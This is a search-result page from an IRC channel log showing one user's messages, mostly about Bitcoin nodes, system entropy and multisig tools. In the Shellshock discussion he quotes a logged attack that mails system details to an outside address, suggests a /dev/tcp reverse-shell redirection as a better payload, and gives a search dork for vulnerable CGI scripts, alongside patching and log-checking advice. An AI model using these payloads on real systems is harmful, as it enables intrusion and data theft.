Show Idle (> d.) Chans
| Results 751 ... 1000 found in trilema for 'f:Naphex' |
Naphex: is that python os.random?:)
Naphex: well what does your os.random() return?:P
Naphex: hopefully your os.random is secure :))
Naphex: CheckDavid: well good luck with that :)
Naphex: CheckDavid: you get more entropy from a generator
Naphex: !up CheckDavid
Naphex: this is how entropy use from /dev/random looks like on a SSL gateway (reasonable amount of connections/handshakes)
Naphex: if you're doing cryptography work (ssl, keys using randoms) and this value is below 200. you have a problem to fix, fast.
Naphex: 2023
Naphex: revo ~ # cat /proc/sys/kernel/random/entropy_avail
Naphex: which gives you the amount of available entropy bytes
Naphex: on linux kernels you have the value exported through procfs /proc/sys/kernel/random/entropy_avail
Naphex: so if you're running openssl it shouldn't go down below 200 bytes of available entropy
Naphex: for any decent cryptography work you'd need more then 200bytes available at any time
Naphex: CheckDavid: depends on how much you use
Naphex: yes
Naphex: CheckDavid: get a server to do that soon?
Naphex: and that damn PoS just gets stuck in the proxy's and downloading 5MB/s of data/s
Naphex: i'm gonna start banning accunetix scans soon. its incredible how many "security researches" and hax0rs just try and run it all day
Naphex: as people get closer to their realization points
Naphex: it will probably take lots
Naphex: "LedgerX Hopes to Establish First U.S.-Regulated Futures Exchange for Bitcoin"
Naphex: they're apperantly htting the presses with it
Naphex: "LedgerX Gets Google, Lightspeed Backing to Set Up Regulated Bitcoin Futures Exchange"
Naphex: mircea_popescu: aye and much needed, with all those people wanting to implement all kinds of solutions based on blockchain data
Naphex: unspents, utxo's etc
Naphex: then delivery it over several types of interfaces
Naphex: a enterprise node, hook into trusted bitcoin core nodes over P2p protocol. Index and cache the data
Naphex: yeah so the thing is..
Naphex: why wouldn't you belive me lol?
Naphex: i am working on a enterprise server solution for bitcoin
Naphex: punkman: well anyway, i had a calendar date to recheck it in 6 months
Naphex: well unless they want to dev the whole infrastructure
Naphex: current implementation is clunky not in any way suitable for running anything in production
Naphex: well i was the protocol is something that i was looking for, with asset servers. the cryptography its pretty simple
Naphex: punkman: i checked out coinspark a while ago
Naphex: thestringpuller: title should be enough :)
Naphex: /window move 5
Naphex: lol
Naphex: ben_vulpes: (>>> Naphex: have you tried btcd?) i have btcd running on a staging server. eats a bit more load but deffinetly not ready to run on production. I'm still grabbing metrics from it so time will tell
Naphex: (in my defense, i am not running any live nodes with wallets attached)
Naphex: aye :P
Naphex: mircea_popescu: i agree, but security you can improve. but functionality will be harder
Naphex: mircea_popescu: and most full nodes out right now except core are all shit
Naphex: i run nodes
Naphex: mircea_popescu: i'm not arbitering shit
Naphex: ;;lasers
Naphex: mircea_popescu: so yeah, i haven't found anything even close to stable as bitcoind :)
Naphex: i only care about CPUTime, everything else is really distant
Naphex: lots of CPUTime on bitcoind might force for standalone bitcoind servers
Naphex: nubbins`: storage is not that much of a problem as CPU Time
Naphex: thestringpuller: load avg on the slavenode would drop around 10x, so thats a lot
Naphex: the supernode fillters all that out, and sends clean to slaves
Naphex: double spends, dust, etc
Naphex: on nodes processing junk
Naphex: thestringpuller: there is a lot of wasted CPU Time
Naphex: yes
Naphex: for updates
Naphex: they just don't p2p connect to the network and only connect to a master node
Naphex: thestringpuller: they store it
Naphex: since the supernode will filter most of the junk
Naphex: the localnodes, hardly ever pop 0.03 on avg
Naphex: i use this as a "supernode" to p2p connect to the network, and use local nodes to scale
Naphex: running on Intel(R) Xeon(R) CPU E5-2640 v2 @ 2.00GHz x2 / 32 Cores
Naphex: load average: 0.30, 0.34, 0.33
Naphex: RX: 56.5 GB TX 117.7
Naphex: 56 day running bitcoind/ Standalone / Max 500 connections
Naphex: whats with all this burden on full nodes
Naphex: well you can scale nodes anyway
Naphex: colored coins with some asset servers
Naphex: and there is just this php tat would IPC with it using shmop lol
Naphex: punkman: the deamon which parsesd bitcoind data dir, uses shmop as IPC
Naphex: atleast their issued code, apperantly whats running on their free servers tracks everything
Naphex: i mind yet*, still checking it out
Naphex: and have to specify some reference ID
Naphex: dignork: yeah, the only thing that i mind is that you can't have asset tracking servers track everything
Naphex: So.. did you guys check out http://coinspark.org/ yet ?
Naphex: hi o/
Naphex: all web checks
Naphex: got like 10 hits, on 5 random honeypots
Naphex: mostly just checks
Naphex: for all that panic with bash not too many exploits hitting
Naphex: lol [26/Sep/2014:00:18:37 +0300] "GET / HTTP/1.1" 200 27100 "() { :; }; uname -a | mail -s 6775 ufquy@grandmamail.com" "curl/7.37.1" "-" script kiddies be leveling up:)
Naphex: var='() { :;}; echo whatever commands you put here runs you are vulnerable' bash
Naphex: mike_c: check is simple cause bash shouldn't run anything in the env
Naphex: safe check
Naphex: mircea_popescu: env varname='() { :; }; echo CodeInjectionHereWorks' bash
Naphex: mircea_popescu: its a stupid check lol
Naphex: 201409-10 [U] Bash: Code Injection (Updated fix for GLSA 201409-09) ( app-shells/bash )
Naphex: mircea_popescu: gentoo has good patch out
Naphex: just patch it, and killall -TERM sh/ bash and you're set
Naphex: rithm: even if you're spam filter is roll your own, if SUBJECT gets passed in Env along the pipeline, and if on the pipeline something hits /bin/sh / /bin/bash it will run
Naphex: mike_c: no, you can change env regardless, its just that if bash interpets the env it runs
Naphex: and pass it around, if corrupted env hits bash it runs and the end
Naphex: all apps use it
Naphex: mike_c: env is general POSIX
Naphex: mircea_popescu: yeah but that doesn't hit sh until successful login
Naphex: so any mail filters, spam filters
Naphex: kuzetsa: mail servers will pass through env as well, on the pipeline while filtering them mails
Naphex: and if that env hits bash it runs
Naphex: nginx / php fpm/ fast cgi all pass env as well
Naphex: but it should be no problem unless thet env hits apache
Naphex: apache still passes stuff through env by default
Naphex: grep for "() {"
Naphex: kuzetsa: you should check logs, make sure you're not owned
Naphex: instead of wget
Naphex: could've just used a reverse echo "code" >& /dev/tcp/8.8.8.8/8080 0>&1
Naphex: what a stupid payload to even ping back
Naphex: fine, pretty boring actually
Naphex: i'm always here :P
Naphex: inurl:cgi-bin env.pl - assume direct control
Naphex: they're quick to update
Naphex: lots of .govs love it too
Naphex: !s inurl:cgi-bin
Naphex: people running CGI must be blowing their minds right now
Naphex: woot, so bash env backdoor, who would've tought :o
Naphex: o/
Naphex: http://i.imgur.com/gDohTUB.png - I call this artistic chart, "Saved By The Cache" :)
Naphex: o/
Naphex: :))
Naphex: ;o
Naphex: poppy seeds?
Naphex: hey moiety, thanks - I did :D
Naphex: got to sunbake, drink and party some for 1 week
Naphex: pretty fun and amaizingly nothing happend while i was gone :P
Naphex: tried to be disconnected
Naphex: been on vacation in ibz for 1 week
Naphex: lol no
Naphex: hey all o/ back from vacation
Naphex: 17:11 <+cazalla> shibe needs to be put to sleep << i loled hard
Naphex: General Failure 321
Naphex: from their PoV anyone who gives a shit about privacy will be an extremist
Naphex: most people in those categories are concerned about privacy
Naphex: pankkake: no wonder
Naphex: davout: grats on merchant feat
Naphex: o/
Naphex: :P
Naphex: gz!
Naphex: yeah, troll's slanged
Naphex: pankkake: "So you build all your trolls only of chocolate?" :)
Naphex: pankkake: romanian has a way of carrying meaning into sentences that will prolly never translate :)
Naphex: pankkake: yep
Naphex: straight with EUR and USD support
Naphex: as well multi-currency is in testing, its gonna go live sometime next week.
Naphex: also need some better voiceover for tv
Naphex: mircea_popescu: nah, TV will have something different
Naphex: a pretty boring day
Naphex: might as well :)
Naphex: mircea_popescu: haha, i ment the content. just uploaded it
Naphex: mircea_popescu: https://www.youtube.com/watch?v=FdWfJiVzKXU - I think it turned out alrighty :)
Naphex: punkman: probably, i'd suck to do 60seconds binary options with 3 confirmations :)
Naphex: is in no way a sign of trust :)
Naphex: well flashing a Bitcoin Foundation Gold Member
Naphex: Vallance: never heard of it before, is that binary options?
Naphex: everyone just attacks the person who moves the money, so might as well just do your own AML/KYC
Naphex: one of the problems with 3rd party validation, is who would get goverment wrath. I doubt they'd be going after the validation service instead of the exchange
Naphex: or how many exchanges/bussiness will want a 3rd party holding highly private data
Naphex: Vallance: i'm not sure how many people will handover 3rd party data
Naphex: gn
Naphex: but for signing a multisig not that bad
Naphex: i agree
Naphex: i wouldn't care much even if 2nd key got compromised, since the raw pre-signed transaction delivered is already composed
Naphex: mike_c: its just for signing a transactions that is already composed and signed, multi sig also
Naphex: maybe i can just roll something quick in js and leave it at that
Naphex: bitcoinjs looks to have multisig support
Naphex: and the raw transaction is read only :P
Naphex: and person B can just sign it providing redemption + privkey
Naphex: but kinda fits, what i was looking for is something where you input transaction, signed & composed by person A
Naphex: probably
Naphex: dignork: lol, ms-brainwallet doesn't look right needing both keys :)
Naphex: dunno why the hell
Naphex: only the outcast one which looked to only work with its own privkeys
Naphex: dignork: thx, haven't seen this one before
Naphex: its no problem, was just looking for a already made tool
Naphex: then they can just sign with password
Naphex: probably even simplify and use lotsa scrypt rounds and use a password to gen priv key
Naphex: i create transaction and just pass it
Naphex: put raw transaction in, + privkey sign it
Naphex: yeah - will probably just write some simple tool
Naphex: then with current bitcoin-cli multisig
Naphex: would probably be easier with bash and terminal
Naphex: which requires quite some manual work
Naphex: davout: yep, but you need to make a json array with the redeemScript, inputs and script-pubkey
Naphex: davout: just need em to sign a transaction once in a while
Naphex: but i'll probably write something simple to sign it
Naphex: the yeah i know sx, but needed something to give to a noob. who won;t be able to command line it:P
Naphex: dignork: nah something custom, just sign a multisig with a privkey
Naphex: to pass to a noob to sign his stuff
Naphex: anyone can recommend a easy tool to sign multi-sig transactions ?
Naphex: what's up in estonia?
Naphex: lousy name for a product though, fire phone
Naphex: so.. iphone with windows ui, got it
Naphex: mircea_popescu: was that interview in romanian or translated?
Naphex: here is a question, will USMS send the bitcoin to the winer or give him private keys/paper wallet?:)
Naphex: romanian has a good way of adding feeling into writing :)
Naphex: doubt it would sound that good in english
Naphex: the cookie hashing scheme seemed a bit lacking
Naphex: at some point maybe people will wise up and stop comming into bitcoin like its hipster web3.0
Naphex: :)
Naphex: mircea_popescu: omu numa prostii observa si invata vad ca
Naphex: anyone got the full bcc?
Naphex: anyone did any intel on the bidders yet?
Naphex: pretty interesting
Naphex: so there is a list of bidders
Naphex: or coinzone or whatever
Naphex: yes
Naphex: mircea_popescu: lol http://fundatiabitcoin.ro/
Naphex: 18:24 <+nubbins`> sometimes it turns out terrible :D
Naphex: 18:24 -!- mjr_1 [~Thunderbi@190.105.171.186] has joined #bitcoin-assets
Naphex: 18:24 <+nubbins`> i've been cutting my own hair for about 7 years now
Naphex: anything with electric razor or bald doesn't count:P
Naphex: :))
Naphex: you don't have to pay attention and maybe you get a sweet skull massage :)
Naphex: yes but why not just pay someone to do it
Naphex: nubbins`: why would somebody cut their own hair?
Naphex: sry bad key :o
Naphex: watch the video:P
Naphex: true story
Naphex: they want it recognized like baitcoin
Naphex: and his gonna mention LOVECoin
Naphex: Gypsy King said next month he has meeting with US VP
Naphex: cryptocurrency :)
Naphex: :))
Naphex: called LOV
Naphex: Romanian Gypsy king releases gypsy coin
Naphex: a must see :))
Naphex: you can scam trophies on everything :P
Naphex: not trophies
Naphex: cazalla: the trick to being pro is getting paid to play :)
Naphex: or not full time
Naphex: how are you likeing it doing it as a full time job?
Naphex: i don't trade at all
Naphex: probably best:p
Naphex: BingoBoingo: we're going live with EUR/USD next week. will you be sticking to ron or going for EUR/USD?;p
Naphex: trying to lax a bit before getting multicurrency live
Naphex: i got back a while ago, but mostly just sitting and idling
Naphex: who writes these titles o.o
Naphex: "Andreas Antonopolous delivers a stunning presentation of crypto currency to a virtual room full of knowledge seeking students."
Naphex: hey o/
Naphex: morning
|
Random(trilema) | Download hourly DB snapshot | Get Source Code